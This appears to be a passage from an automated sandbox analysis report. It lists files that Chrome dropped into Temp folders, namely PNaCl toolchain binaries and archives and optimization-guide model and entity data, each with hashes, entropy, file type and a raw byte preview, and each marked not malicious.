SHA-512:	59DF2D5F2684FACC80C72F9C4B7E280F705776076C9D843534F772D5A3D578BEE04289AEE81320F23FB4D743F3969EDF5BA53FEBBAC8A4D27F3BC53BCF271C3E
Malicious:	false
Reputation:	unknown
Preview:	{. "COMMENT": [. "This file serves as a template for the resource info description used by ", . "the NaCl Chrome plugin. It is kept in the NaCl repository to prevent ", . "hard-coding of NaCl-specific information inside the Chrome repository.". ], . "abi-version": 1, . "pnacl-arch": "x86-64", . "pnacl-ld-name": "ld.nexe", . "pnacl-llc-name": "pnacl-llc.nexe", . "pnacl-sz-name": "pnacl-sz.nexe", . "pnacl-version": "5dfe030a71ca66e72c5719ef5034c2ed24706c43".}

C:\Users\user\AppData\Local\Temp\4872_162518063\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_for_eh_o

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
Category:	dropped
Size (bytes):	2712
Entropy (8bit):	3.4025803725190906
Encrypted:	false
SSDEEP:	48:b/5D5V5PK82aTS6aTTw0Do1DttoyDNsEA:b/hbVic1ZtLDNsE
MD5:	604FF8F351A88E7A1DBD7C836378AE86
SHA1:	9D8D89AE9F13D6306E619A4EAAD51EDE91A5F9F3
SHA-256:	947E64BE43E821562CE894F1AFCC3D09CD7FF614C107FC94250CD3EA5C943302
SHA-512:	85B1EDA4C473E00034EE627B7ABB894A77E521BC6A91A91A4A3744CA7511CB0AF10B9723D9ECC2CE3378DD70B659DF842D8C11875958CB77070CF01EC0A15840
Malicious:	false
Reputation:	unknown
Preview:	.ELF..............>.................................@.....@.......................................PH.......,$J.l=....J.$<A[..@.A...M..A..ffffff..................PH......,$J.l=....J.$<A[..D..A...M..A..ffffff..................PH..1..,$J.l=....J.$<A[.......A...M..A..ffffff..................PH..SP..h.........fff...................h.........fff.............J.$<[.,$J.l=....J.$<.....f.....................................................................................................................................................................................NaCl....x86-64...........zR..x......................@....C....C.........8.......@....C....C.........T.......@....C....C.........p.......`....C....C..B...... .......................<...............@.......X.......................t........................clang version 3.7.0 (https://chromium.googlesource.com/a/native_client/pnacl-clang.git ce163fdd0f16b4481e5cf77a16d45e9b4dc8300e) (https://chromium.googlesource.com/a/native_client/pna

C:\Users\user\AppData\Local\Temp\4872_162518063\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_o

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
Category:	dropped
Size (bytes):	2776
Entropy (8bit):	3.5335802354066246
Encrypted:	false
SSDEEP:	48:b/5D5V5ej5ej5PjDdaTS6aTTw6DV1DtFouoyDOsTy:b/hbEEVJB1ZFhLDOsT
MD5:	88C08CD63DE9EA244F70BFC53BBCADF6
SHA1:	8F38A113A66B18BAA02E2C995099CF1145A29DAA
SHA-256:	127F903CC986466AA5A13C17DFDD37AC99762F81A794180339069F48986BC7A3
SHA-512:	78D2500493A65A23D101EC2420DC5F0CE8C75EFAC425C28547121643E4FB568E9D827EF2C0F7068159E043C86B986F29BF92C6BADC675F160B63C7B3512EB95F
Malicious:	false
Reputation:	unknown
Preview:	.ELF..............>.....................X...........@.....@.......................................PH.......,$J.l=....J.$<A[..@.A...M..A..ffffff..................PH......,$J.l=....J.$<A[..D..A...M..A..ffffff..................PH..1..,$J.l=....J.$<A[.......A...M..A..ffffff..................PH..,$J.l=....J.$<A[f........A...M..A..ffffff..................PH..,$J.l=....J.$<A[f........A...M..A..ffffff..................PH..SP..h.........fff.............J.$<[.,$J.l=....J.$<.....f.K...............`.......P.......................z...................................NaCl....x86-64...clang version 3.7.0 (https://chromium.googlesource.com/a/native_client/pnacl-clang.git ce163fdd0f16b4481e5cf77a16d45e9b4dc8300e) (https://chromium.googlesource.com/a/native_client/pnacl-llvm.git 7251d5b59fca15195c94a3a7da70f0081724448f)............zR..x......................@....C....C.........8.......@....C....C.........T.......@....C....C.........p.......@....C....C.................@....C....C.................@...

C:\Users\user\AppData\Local\Temp\4872_162518063\_platform_specific\x86_64\pnacl_public_x86_64_libgcc_a

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	current ar archive
Category:	dropped
Size (bytes):	132784
Entropy (8bit):	3.6998481247844937
Encrypted:	false
SSDEEP:	384:Hf0mOXYmeKzQUIdedRFvT5p1Ee2HyAlL3O4:Hf7OXdmWRJT5p1R2HyAhO4
MD5:	C37CA2EB468E6F05A4E37DF6E6020D0F
SHA1:	EA787E5EADFB488632EC60D8B80B555796FA9FE9
SHA-256:	C1483ED423FEE15D86E8B5D698B2CDAB89186CE7FF9C4E3D5F3F961FD80D7C6E
SHA-512:	01281DE92B281FB29E1ACA96AA64B740B65CC3A9097307827F0D8DB9E1C164C56AFCDFA0BF138EA670A596D55CE2C8D722760744E9FC9343BB6514417BF333BA
Malicious:	false
Reputation:	unknown
Preview:	!<arch>./ 0 0 0 0 942 `....;...\|.......4...x..#...-...4l..E...M...U...]...n...u...~X...4.......................L......................t...p...............`......"...*...1...:...D...K...T...\...d...r\|..\|0.......x...........L.......\...8..........................__clzti2.__compilerrt_fmax.__compilerrt_fmaxf.__compilerrt_logb.__compilerrt_logbf.__ctzti2.__divdc3.__divdi3.__divmoddi4.__divmodsi4.__divsc3.__divsi3.__divti3.__fixdfdi.__fixdfsi.__fixdfti.__fixsfdi.__fixsfsi.__fixsfti.__fixunsdfdi.__fixunsdfsi.__fixunsdfti.__fixunssfdi.__fixunssfsi.__fixunssfti.__floatdidf.__floatdisf.__floatsidf.__floatsisf.__floattidf.__floattisf.__floatundidf.__floatundisf.__floatunsidf.__floatunsisf.__floatuntidf.__floatuntisf.compilerrt_abort_impl.__moddi3.__modsi3.__modti3.__muldc3.__muloti4.__mulsc3.__multi3.__popcountdi2.__popcountsi2.__popcountti2.__powidf2.__powisf2.__udivdi3.__udivmoddi4.__udivmodsi4.__udivmodti4.__udivsi3.__udivti3.__umoddi3.__umodsi3.

C:\Users\user\AppData\Local\Temp\4872_162518063\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_a

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	current ar archive
Category:	dropped
Size (bytes):	13514
Entropy (8bit):	3.8217211433441904
Encrypted:	false
SSDEEP:	192:uU9v4pXizdrEuxwk3vp20tprpdSGFwDqO:P9v4palvvc0tpFdSGFwmO
MD5:	4E8BEDA73EB7BD99528BF62B7835A3FA
SHA1:	DC0F263A7B2A649D11FF7B56FE9CFAC44F946036
SHA-256:	6B835FD48DF505EB336FF6518CE7B93BB0ED854DADAA5C1EEED48D420291F62C
SHA-512:	46116B8BABC719676D68FD40D2AC82F38A3D13D8A482ADFC6FC32A99170AC3420E52CC33242CCD0FA723ABF4FA5EDBB9CE16A09C729BF04AE4AFBB2F67A1E38B
Malicious:	false
Reputation:	unknown
Preview:	!<arch>./ 0 0 0 0 94 `................._pnacl_wrapper_start.__pnacl_real_irt_query_func.__pnacl_wrap_irt_query_func..shim_entry.o/ 0 0 0 644 7392 `..ELF..............>..................... ...........@.....@.........................NaCl....x86-64..................................A.L....A.L...D...........D....A.....t+.. u..t"..A.D..........A... .....A.D...........f..D..<.......................Q.......................V.......................clang version 3.7.0 (https://chromium.googlesource.com/a/native_client/pnacl-clang.git ce163fdd0f16b4481e5cf77a16d45e9b4dc8300e) (https://chromium.googlesource.com/a/native_client/pnacl-llvm.git 7251d5b59fca15195c94a3a7da70f0081724448f).../../ppapi/native_client/src/untrusted/pnacl_irt_shim/shim_entry.c./mnt/data/b/build/slave/sdk/build/src/out_pnacl/x64.NACL_STARTUP_FINI.NACL_STARTUP_ENVC.NACL_STARTUP_ARGC.NACL_STARTUP_ARGV.NaClStartupInfoIndex.unsigned int.size_t.char.TYPE_na

C:\Users\user\AppData\Local\Temp\4872_162518063\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_dummy_a

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	current ar archive
Category:	dropped
Size (bytes):	2078
Entropy (8bit):	3.21751839673526
Encrypted:	false
SSDEEP:	24:MOcpdhWE5O/bZbmT3296bmT3TwQwDnvD/+R3:MHuECdaTS6aTTwXDvD/+l
MD5:	F950F89D06C45E63CE9862BE59E937C9
SHA1:	9CFAD34139CC428CE0C07A869C15B71A9632365D
SHA-256:	945B1C8A1666CBF05E8B8941B70D9D044BAAFB59B006F728F8995072DE7C4C40
SHA-512:	F9AFBB800A875EDCC63DEA4986179E73632B3182951A99C8B3D37DB454EFD7CC7192ECA5AC87514918A858BAD6DAEAB59548CA2E90EADA9900EF5B9F08E62CFC
Malicious:	false
Reputation:	unknown
Preview:	!<arch>./ 0 0 0 0 30 `........._pnacl_wrapper_start..// 20 `.dummy_shim_entry.o/./0 0 0 0 644 1840 `..ELF..............>.................................@.....@.......................................PH..,$J.l=....J.$<.....f..D......................................NaCl....x86-64...clang version 3.7.0 (https://chromium.googlesource.com/a/native_client/pnacl-clang.git ce163fdd0f16b4481e5cf77a16d45e9b4dc8300e) (https://chromium.googlesource.com/a/native_client/pnacl-llvm.git 7251d5b59fca15195c94a3a7da70f0081724448f)............zR..x...................... ....C....C..... .........................rela.text..comment..bss..group..note.GNU-stack..rela.eh_frame..shstrtab..strtab..symtab..data..note.NaCl.ABI.x86-64.....................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4872_162518063\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_llc_nexe

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=309d6d3d463e6b1b0690f39eb226b1e4c469b2ce, stripped
Category:	dropped
Size (bytes):	14091416
Entropy (8bit):	5.928868737447095
Encrypted:	false
SSDEEP:	196608:tKVqXp3Qev4dg6ilfHM8KLM2J3jqjnkZ:uqufB
MD5:	9B159191C29E766EBBF799FA951C581B
SHA1:	D1D4BBC63AB5FC1E4A54EB7B82095A6F2CE535EE
SHA-256:	2F4A3A0730142C5EE4FA2C05D27A5DEFC18886A382D45F5DB254B61B28ED642B
SHA-512:	0B4FF60B5428F81B8B1BCF3328CF80CBD88D8CE5E8BDBC236B06D5A54E7CF26168A3ABB348D87423DA613AB3F0B4D9B37CB5180804839F1CA158EC2B315DDF00
Malicious:	false
Reputation:	unknown
Preview:	.ELF..............>..... .......@...................@.8...@...............$.....................................................................................................................!.......!......'......G...............................................@.......@...............P.td............................D.......D...............Q.td................................................................NaCl....x86-64..............GNU.0.m=F>k....&...i........................0C......0C..0C..0E..............0C......0E.-DT.!.?.-DT.!.........................?........-DT.!...-DT.!.?.......?......................?..............?."..."..."..."......@.......`...................... ...@...`...................... ...@...`...................... ...@...`...................... ...@...`.......................................`... ...@...`...........`...`.......@...@....... ....1..`3.. 4..`-..`-...:...:...F..@H..`H...H...F...F...G...H.. H...F..@G...I.. I..@I..@G...G...I...I...J...G..`I..

C:\Users\user\AppData\Local\Temp\4872_162518063\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_sz_nexe

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=4b15de4ab227d5e46213978b8518d53c53ce1db9, stripped
Category:	dropped
Size (bytes):	1901720
Entropy (8bit):	5.955741933854651
Encrypted:	false
SSDEEP:	12288:gXqUSpBjwQO2o8k+7zjidg4euCAauOILffvCpGy4Wh3BTFmHpq82K2/KsvPyla9d:gafZwcOdNe2auOepCBTFmJq3Kf8ksr
MD5:	9DC3172630E525854B232FF71499D77C
SHA1:	0082C58EDCE3769E90DB48E7C26090CE706AD434
SHA-256:	6AA1DA6C264E0AF4E32A004F4076C7557C6AC6D9C38B0C5DE97302D83FA248C3
SHA-512:	9E9584241A39EED1463D7D4C1B26AE570B839AA315778FF3400C61341EBA43B630307DE9F1532A265CA82EA69BDEA03EC9D963E59A18569C02DA8285449870FE
Malicious:	false
Reputation:	unknown
Preview:	.ELF..............>..... .......@...................@.8...@.............................................................................................0.......0................................................Y......................................................@.......@...............P.td....t^......t^......t^.......W.......W..............Q.td................................................................NaCl....x86-64..............GNU.K..J.'..b......<S...`...`... ...@...@.......@.............................................Y@......................p................@.......?..............?.......A.........5.....?5.5...?.5.....?......P9..............PC.......?......0@................aCoc...?..`.(..?.y.P.D.?<.s..O.u......$@.......@...............@`...`.......@.................................................. ...`... ... .......`................... ... ...@...`.......................@... Z...[...[...e.......... ...@... ...@...`........0...0...2..`4.. 6...7...9...~...~...z...{...{..

C:\Users\user\AppData\Local\Temp\4872_1800306078\model-info.pb

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Bentley/Intergraph MicroStation
Category:	dropped
Size (bytes):	12
Entropy (8bit):	3.584962500721156
Encrypted:	false
SSDEEP:	3:qKaDO:qKaDO
MD5:	682E1B9EAAE0E93E0E185C9525986E96
SHA1:	0B1ABED8120DA66D2B76B67D1881C3615EF3436D
SHA-256:	E2CE5550B6AA239D48F404D5BB33696E58F959C9B305C64E5BBC50BE82B30CFA
SHA-512:	2791CE607B94C2DC4349227819DC719F135955DCA552AB403969353E14F4C74B1564785FCAB9B5F69F5E763CD7A432FC2F01B8E26899F081A2C8A262B7AEFDA7
Malicious:	false
Reputation:	unknown
Preview:	.....0"..

C:\Users\user\AppData\Local\Temp\4872_1800306078\model.tflite

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	13924
Entropy (8bit):	4.524411316778424
Encrypted:	false
SSDEEP:	96:6ZuzUpYY9WW1H9xjMqvo0zjCOgxcyR7dCMUdvRWqIC2s8vvcr17/eFt9n9nFWB5A:JQEWh9x7ghb4r7pi4nBf+
MD5:	DD91CF850364320FA627573BEAAA8BDE
SHA1:	05F312EB672A32EF95ADEFC51A0BDC688C4B71AA
SHA-256:	CA54E4D1D1AE7932CE97FEDE0717956905BD9E796779ACC4C1A0BA75737F91AC
SHA-512:	B65A5D07646FDE821BE8A281002C2DB233E40184CF2E397443D5D659BE25679F5370AFD3C32D594FD828EBB37799147522357C40167711BC27C26E71CE066104
Malicious:	false
Reputation:	unknown
Preview:	....TFL3.. .............................t...@...P...$5..............4...........N...........CONVERSION_METADATA.............M...........min_runtime_version.O...........................................x...p...h...P...<...(...................................t...`...L...8...$...............................................................x...p...h...`...X...P...H...@...8...0...(... ...................................................................................x...X.......N.......D............... ...............................................2.11.0..............1.14.0.............................................................................................................................................................. ...$...(...,...0...4...8...<...n............d3?...=..............Z=.x.>...............<............................b$.?..............k...............5?..............X?............'5.?..............j.............6.5?&...........N.X?6...............F...........0..>V...

C:\Users\user\AppData\Local\Temp\4872_240839503\global-entities_metadata

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	29747719
Entropy (8bit):	7.553089146596958
Encrypted:	false
SSDEEP:	393216:Aiq7Mc1oteqlInpBOzSUd20vf2yUjsPdIWhQ8GeoqxcjFXuFat2WnmrRJE:AL7RokZBOzHd2r5sPiW5ogcjkFavqjE
MD5:	4A5251EF82B401065C18CF9ABFA28F46
SHA1:	38919DCB91872F95BCA242779BD0D1A857AD512F
SHA-256:	379EA3CBD805228A25A4645E3B7500B54FB0ED51342674A704F08EA22E86C1BB
SHA-512:	9E3DA5F7EC8917F8F8E305B8E17D5B39CE800D2E5328EF244D647B27DF2FCF28E0711ED0242C73B00D21EB6A346A391CDA5C8AA3191B49D217EE0C3215DC5F7B
Malicious:	false
Reputation:	unknown
Preview:	. .i............. Los Angeles County Museum of Art...49+..BC. Z?.4.....f].z...qF....w....9i...[.M.....s......b.....j..................Z\|?....?........A\|.....%.S^S..$.........z.........E..(......<.{.. .......h.. ......@Lf..,.i....?.fff?......%...].....+....@..Air freshener..f........6.6...Date Ariane..:. .A..Z.Z.V..F..6..8._.R..z...v...52....9<....6...".......W'..$.........U.#...K..,n..$.........5.(........5.}.&.....2....I%Visual design elements and principles. }^.z...xf...=.>4...==.p1.O_.......O..F....%..e...~Q......d.....+.l?.33s?........@.[{.6.....9%4...Makar Sankranti.... ><.r..9..A.[L..%.._........r..$.........s..$.....3..~I(....8...8.#.....m)C..Ajiaco..@. .Q`...}6.Ix.\|L~.AJ.c..T......z......)..IZ.c.t.......r..$.....4.d$w9( ........p.% ........s.$.....-.3.u($......@.r..H .......t.H......"!q...Xiumin..$H)..#J6. .[....m\....].qf.6.g.nI.\...Yr.. ...b........k...4.z....(..c...$........P..(......../.... ....K...(..(........Q.........A.4..Ray Sahetapyv........40.

C:\Users\user\AppData\Local\Temp\4872_240839503\global-entities_names

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Applesoft BASIC program data, first line number 9
Category:	dropped
Size (bytes):	26510576
Entropy (8bit):	6.945059200432203
Encrypted:	false
SSDEEP:	196608:rGivLHpQn5wcHmIHfkK0nNG78ig/U3YkWM2WY4aBsWraubKnsjWeMjO/l7Ju:rG6LcLHm/ngOM2dqzWKniWPsu
MD5:	07CD1F4E37FDF896D45F6308E679D6D3
SHA1:	BF4C0D90D1A02468F5095F7BD144781434DC6C73
SHA-256:	483A454B9A0E2F35B988BDF28C553CEA4A525695E1274868A0CBF15F08FE6FC8
SHA-512:	A34C4DBCAB8F2CE42F9415AE1695D601660981BD0708EF31A1F49799D48E07785E3C17CB87D0360FBE2994CA1E13A78683B53CE77D5538B28A70CAEE4F038B52
Malicious:	false
Reputation:	unknown
Preview:	............ ....(8...!~.uv... ......(;...2ht.jC.. ....("...b..de... ....(c...p...*... ...(p...sa .$... .......(....x`..._.. .....(7...\|..[Q... ..-(=....X..\... .....(S.....D..... .......(,........... ....(0....Qic\|f.. ......(L....E.7.... ....(>........... .......(w........... ....(N....l..... ...(i......z._.... ....(\....pH..... ...%(L....n.Swr.. .......(R....i..AB.. ......(......gqGeQ.. .......(h.....[%Z+.. .....(K.......... ....(K.....W... ......(Z....e"..... ....(6....9.().. ..4(\.....6.6u.. ....(@...#M.C.... ......(?...&..@&V.. ....(7......{f.. .....(\|...(.,n}p.. ....(`...6....S.. .....(0.....7s.."... ...(z...=..... ......(<...X/.{E... ....(U...iR./.9.. .......(A...m'.n2... .......(K...{"z.<Z.. ....(9....BIOQ... ...(`....F5.... ..2(H.......)... ....(/......0.b.. .....(r....W.... .......(7.....5.E.. ....(u....3D.... ....#(Q....DI.Z.. ....(z....+.uP... .....(H......... ....(X......O.S.n.. ....(7....z.(P.. ....\|(%.....4..1... .......(b..

C:\Users\user\AppData\Local\Temp\4872_240839503\global-entities_names_filter

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	830721
Entropy (8bit):	7.450847459983356
Encrypted:	false
SSDEEP:	24576:+F/VsiP4eEOWMwIBOyqFJ8TBwy0zktBKMXDWZu:oV6eJBmFJGBFhSu
MD5:	8499188718D6C9173DEE32B234CA5C3E
SHA1:	12176AFFCAF756D85AB964C4766E91FF191B18EB
SHA-256:	BD4718F4CB57F283E79560D4D0F2BF7C912145BF4AFF65C99DD27B5BEBBA0D04
SHA-512:	D1A25EF9DE6113B8EC682061FA629473B86AD04A1AC901CB365C075EBB206D15301CEA26E599D007F4A5177EAD2FA8120E97D67A6DFA16D4EFFFEF3B6A190AB0
Malicious:	false
Reputation:	unknown
Preview:	....@(a.Hx.O....T$..?c5P 0R`CA..J. .0.. s.@...$.....D.@.`.(..#D...b.@.."_$(.@.!1j_........p.zL..dQ...PT.2.S..`..,...@.../..!.S..50.!..!.X..A?...@+.Hr.dW..%$.,...."...(....`..%!.P.\|n@S....@.........9 Hs......F........0.qx....V...0T..!..P.7`!.x.!q.@...<..-"HJ.Pd`.h.0..-..W.`.@.j.A`...."vR.l..t`G.<..C.c.b.@.0..(q..4....Q..A)...@D@......U..LJ@.!..2@..%9..$.H....UNC).(B..j.c....J........\|...3......dB0.9.H..DFd.".pP..... ....'.......k@@A...!T.h.".HPp.b.....V@@O.\|D....!5]....,..D)..'...".... .W.Aq.....\|.@. @.MP.T0...0...A.a...pR..X`..P....... ..I...HN..!./.p.....J..4.......q..c.I.. .r8X..a.........C....hs5... $.Q..V$x.JP.[i....e....Ah....@.@.!#.4N...K....@0..H.4I0..xH.z8..........L.9..C@....$.r......,.. .y0.`.........$l.......@x..).c")..U.l.@CP... ...g.!....p+."@...p.x..`g.4.0F.0N....BHdd@ ..."0...Q2.b.@H.$..8..Gp.$.V x%DThEB...I.8..K....W..`i.Y I.....B..4.YIgJ..6c..B...D.e"Fe."(. r......`....PC.K.P.2.@h.A...Lb`.........P"..@...4..SH...e...(.....g..E....$-B:.FQH..c.}.^.@.

C:\Users\user\AppData\Local\Temp\4872_240839503\global-entities_prefixes_filter

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	232904
Entropy (8bit):	7.557578420892044
Encrypted:	false
SSDEEP:	6144:WQr6kjXfX5w0PznLILqQce7hGpuMOkqTjViv6BYNwEFWML:WS1XxwSQYqDKNxF1
MD5:	00E11BEA8605B30D9B333531C53D3E75
SHA1:	E9B5596AFE1CE6B9D48F6873DF73904245A62190
SHA-256:	BB1837C8878F22469FE37632D964C7BAFC074661077A0AA3D2BF7DDB2A2F6C30
SHA-512:	9FCDA1AC533DF7B159E3B2C8B3E98969B8D6160DF127C82675FB2A0FD14E170CBDD80891D32B6D57054CF00C7CAC3D3F9F807C6EE73E683B1BB8AAFC4077111A
Malicious:	false
Reputation:	unknown
Preview:	......4.-0......A..@..H..A..^..,!R...U....HP...... E...iS ......Hf.f..d....;..;;........h.#2..@...$1....... D.Dp......&....UXT...(.mP.B..rBN.#..{......z...Q5...A..fw.67s?qsc.C.. ..B #@.P2...&...% gB(......j..B!. . ...$C.........) ......P...."..8Cf...E......~.w...Apt..P@...1d4..e.@0. U.b.g..0.8.3...Y..8.t...... A.e\...B.aD....U..1..!..}.........%c.:......^.......C...@..:..+...E...i.0(..A@.vq.8.!..E#.uG.O.....X.W....1.`..s......E.f0a....l..=.$.B.......N.....C.. ..........."...v. J.)ad/.....N...H.1.Lb".'vw.uv.g.7.S...........c......d...Tp..m....y.H......fCp....TP....=@. ...@..X..A..u8#\|........M~.&...K]......$.......].4.....Ok..`..@0$.D..x@..@d..."..CbMp!(`....D.;0$P ............._..!.T..,"..".....)....GC......TpJ.C.0T.."2..7......$..I..f...2.p..).l.J..0..............p`. m..9....@...p. Cp..x'D.)..........~..... ..dD.L.b.)=.z@..$a.@e..&hw..fwc.w.{3..qfT,R,....%.T.(L .#...4.8....TS..>.n... ..w.)....BLp. `.......A.N@(C.XA".............f.FpC"[.X.. h........"..F.....h.

C:\Users\user\AppData\Local\Temp\4872_240839503\model-info.pb

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	277
Entropy (8bit):	4.931140066327276
Encrypted:	false
SSDEEP:	6:NyHVRKgLOczRb4wFfm6E4DHviO1DkRYDCabY3gEApfcE:NyXzrp/moD71DoYDCaYbApf1
MD5:	6AA9AAA0186EA78377053FF28FA27BCB
SHA1:	10C1A410D5C5D0FDE3079C17CBC6492FB4F7DD6B
SHA-256:	6B0467D77ECB9E4CE1586D9B20C35E9EFA2EFD019A654F8234BE7042D1EA3DB5
SHA-512:	9269839BC99E55E0D6B1B56D0E27C42C021FF31832A566C9F60706F97521B0651579329FB961EA83BEC9191BD4F5D9EFE16A57B60391860E9F582BE7A316EC72
Malicious:	false
Reputation:	unknown
Preview:	......0"..2g.Ytype.googleapis.com/google.internal.chrome.optimizationguide.v1.PageEntitiesModelMetadata......global:...word_embeddings:...model_metadata.pb:...global-entities_names:...global-entities_names_filter:!..global-entities_prefixes_filter:...global-entities_metadata

C:\Users\user\AppData\Local\Temp\4872_240839503\model.tflite

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	410376
Entropy (8bit):	7.178086442654218
Encrypted:	false
SSDEEP:	6144:j4Ym8gmGjPFQAywKthp8kyRNjfEJ39S5XSqwbquUIZOGhgWWnAtM9:0oGbFQAyIRdQ6CqweuUih164M9
MD5:	FBC9347A6B3346474EA54E3D597F0E61
SHA1:	CE88F31D16225EFC8F98B36C838BD09372053904
SHA-256:	39D421B174E1F5E7C241628D11CC07BC3E2D50A750A61B2F35582A8FFB65482B
SHA-512:	56A26AEAD2439E8D8008F661A1CC8A27C147A0E9D1846044CE8A7DEDC371D3AE2286EFD4E038AFBBA829BC19BB4D92A8457D5F05C10F44D5750B3B1D7E59642D
Malicious:	false
Reputation:	unknown
Preview:	....TFL3.. .............................t...4...D...(A..............4.......................CONVERSION_METADATA.........................min_runtime_version.....................................\|...t......T......4.........................l...P...4...........x.......r..Hr..8b...a...Q...Q...@..h@..X0.../......(...........x...h...........8...(..................X...H................z..xy..hi...h...X..8X..(H...G...7...6...&..X&..H...................x...h...X...........(...........x.........H...8........p...p..._..._...W...W..dW..HW..(W...W...V...V...V...V..\|V..\V..DV..(V...V...U...U...U...E...E...E..lE..XE..H5..(5...5...4...$......................x...h...X...H...8...(t...d...T...C...3...#......................x...h...T..............\|...`...D...,.............@.............<...................l......L.......,...........\|......\......<...................l......L.......,...........\|......\......<...................l......L.......,...........\|......\......<...................

C:\Users\user\AppData\Local\Temp\4872_240839503\model_metadata.pb

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	2792
Entropy (8bit):	5.0622742873807205
Encrypted:	false
SSDEEP:	48:oH38zzAzeUnVRlCp+S6NqUTwcxlmErwwy11AYcrbI2:oH3yAqUnvlCQfNqU/211X2
MD5:	CB144D21AE33C33A1192CAD6223A1076
SHA1:	A7AECDCA8C8687A4C73362000B5B06A5038057DC
SHA-256:	074C82B74B3999119AC2321A1ECB933946DA95AD72D2CBF73B71003CEF93F1F1
SHA-512:	E6EC4BBBBC8648AA6BEF90BBC2FE988A7E187D40D9A8C709B4655909FFA61C11B9343382B4F87938DB78F7CB233AF0EAD608B8717C30278DA45E710F95220DF2
Malicious:	false
Reputation:	unknown
Preview:	......0.H.P.X..."...../collection/accommodations"...../collection/actors"...../collection/airports"%...!/collection/anatomical_structures"...../collection/artworks"...../collection/athletes"...../collection/authors"...../collection/book_editions"#..../collection/business_operations"...../collection/cars"...../collection/causes_of_death"8...4/collection/celestial_object_with_coordinate_systems""..../collection/chemical_compounds"!..../collection/consumer_products"..=../collection/countries"..>../collection/cuisines"!..../collection/culinary_measures"...../collection/currencies"...../collection/diets"-...)/collection/disease_or_medical_conditions"(.?.$/collection/educational_institutions"...../collection/employers"...../collection/events"$... /collection/fictional_characters"...../collection/film_actors"%...!/collection/film_screening_venues"...../collection/film_series"...../collection/films"..@../collection/foods"...../collection/garments"".A../collection/geo/business_chain"!.B../colle

C:\Users\user\AppData\Local\Temp\4872_240839503\word_embeddings

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	1149370
Entropy (8bit):	6.989299810768632
Encrypted:	false
SSDEEP:	24576:lyct25h2qYEYfvGjCx8/U6co9bkDhUqPtRxM8Z9cWALISy8B:45h2hLv0CKU0kDPVLZ9cWzSbB
MD5:	8F10D6BCB0B9AD4DF0EA6C046C89B710
SHA1:	EAAC7DFC9EC6E5CDE1A96929AC7E1BD8A3B48E69
SHA-256:	3240EF3FDCA04A5FFC52E7429EBFD8D0227C37F6BE62DF230F25D65EC9AABB19
SHA-512:	1575937679E90E444B29EA258A84E4CF31B0E12BA9426DF8AC34C28FC49F1D9EDC77D684E3937646807D668BD2E68FFEB21342B056B8E36FE992F4F2A715B9C4
Malicious:	false
Reputation:	unknown
Preview:	.. ....v..r....f...w..f..jpk.m.tu..}.}Z.. ...x.O.`yyzx.t._..\|s~..y..x..oozu.^.. .y.O_.t..^h....k...bW..x}yS.Rs..{.z.. .\..w.....hx...c.y.a..e.l....cu~.... ...kk...x.....z{.j..w..~...ln~.nw{s.. .y.a.nn[Mp.k.zj.......ihxk{q...@k.... ..Lm.toz``y}.Ysr..~..g.i~._...hr.:.. .e.k{x..Xe.f....dwn..\|...g.e..^ae{X.. .".a2kR.a\|nH.F.^kT.j....c.../....qI.. w.qu.w.v......y.qY....ow..mWjs}u.r.. ...\|.b.\|.xtX.\|.m{UUY..f..h.\|.vh`\.v.. .......y]x..}.y...^....d..k..wmx..... ...u}}...uz..[.j\e]..g~.G..i.qI.z.^.. o..n{.jK....Xe..b~.gz.Xd.ev...o..... ..bP.p..Nngg..Zvvq..zZ.O_}.i....Z[.. &..p....w.e}.qYn.}.[}nceovV.d...q.... .'0....bp...qe..JM\|.\|lp.}~..p.h...X... 1WJ.j...~l.....ht.h....~.....js..{d.. 3/q\|}.X.....f..A.[....hsU.`J_r[.h[... 57.....u..b.{iysKqw..wn.i..r~..z.R... :....v.g....\|yW..w.{..fxi\|d.....`t... ;.Vq_n.}.u.\|m..iX.o.j.mno_...ro...... =^tm.~.....t\...r.Uo.}tsuZu......m~.. B.R~a.i^Z....zp...i.o..i...{z..r}v... D.-..Z.iq...Uze...apg6`.jWA..rj...... Fk..{ndV...SO.ih._.t....ye..qt...Yx.. H.>.ueWp.

C:\Users\user\AppData\Local\Temp\4872_453272877\model-info.pb

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	14
Entropy (8bit):	3.52164063634332
Encrypted:	false
SSDEEP:	3:fubuW:yuW
